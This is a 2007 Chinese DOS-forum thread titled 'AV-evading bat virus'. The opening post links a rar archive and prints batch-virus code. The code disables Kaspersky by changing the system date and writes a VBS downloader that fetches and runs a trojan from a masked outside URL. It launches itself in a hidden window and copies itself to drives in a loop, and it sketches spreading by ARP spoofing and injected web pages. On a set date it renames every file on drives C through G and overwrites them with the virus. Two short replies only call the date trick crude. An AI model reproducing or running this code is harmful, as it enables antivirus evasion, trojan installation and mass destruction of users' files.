中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
作者:
标题: 免杀bat病毒 上一主题 | 下一主题
KKIILDL
初级用户





积分 48
发帖 32
注册 2007-2-28
状态 离线
『楼 主』:  免杀bat病毒

http://zhenlove.com.cn/cndos/fileup/files/bat.rar  
它可使卡巴无法使用:
set date=%date%
date 1990-03-02
自动下载木马:
echo download ...
rem 3. dsa.vbs
echo Set xPost = createObject("Microsoft.XMLHTTP") >dsa.vbs
echo xPost.Open "GET","http://***.***.**/*.*",0 >>dsa.vbs
echo xPost.Send() >>dsa.vbs
echo Set sGet = createObject("ADODB.Stream") >>dsa.vbs
echo sGet.Mode = 3 >>dsa.vbs
echo sGet.Type = 1 >>dsa.vbs
echo sGet.Open() >>dsa.vbs
echo sGet.Write(xPost.responseBody) >>dsa.vbs
echo sGet.SaveToFile "*.*",2 >>dsa.vbs
cscript dsa.vbs
del dsa.vbs
=========================================
CreateObject("WScript.Shell").Run "cmd /cbat.bat",0  着是隐藏DOS窗口start bat.bat 的vbs
===============================
u传播
局域网中采用arp欺骗传播(这个要有个免费空间)
在*.htm *.html *.asp *.aspx查上网马
ping 127.1 /n 6 这个用来延时:
:a
ping 127.1 /n 6
copy %0 i:\
goto a
2007.5.1 会将覆bat.exe盖c,d,e,f,g上的所有文件:
cd\
for /f "delims=" %%m ('dir /s/b/a-d G:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d G:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%q ('dir /s/b/a-d f:\*.*') do @ren %%q *.exe
for /f "delims=" %%w ('dir /s/b/a-d f:\*.*') do @copy %windir%\bat.exe %%w
for /f "delims=" %%m ('dir /s/b/a-d e:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d e:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%m ('dir /s/b/a-d d:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d d:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%m ('dir /s/b/a-d c:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d c:\*.*') do @copy %windir%\bat.exe %%k
exit\b

2007-4-16 00:33
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
bjsh
银牌会员





积分 2000
发帖 621
注册 2007-1-1
状态 离线
『第 2 楼』:  

无非是通过修改时间使卡巴无效。发现很多都是通过这个的;不过一直比较鄙视这种做法;一点也不高级。

2007-4-16 01:18
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
vkill
金牌会员





积分 4103
发帖 1744
注册 2006-1-20
来自 甘肃.临泽
状态 离线
『第 3 楼』:  



  Quote:
Originally posted by bjsh at 2007-4-16 01:18:
无非是通过修改时间使卡巴无效。发现很多都是通过这个的;不过一直比较鄙视这种做法;一点也不高级。

严重同意,哈哈,修改win内核的才是高级的

2007-4-16 02:12
查看资料  发送邮件  访问主页  发短消息 网志   编辑帖子  回复  引用回复

请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转: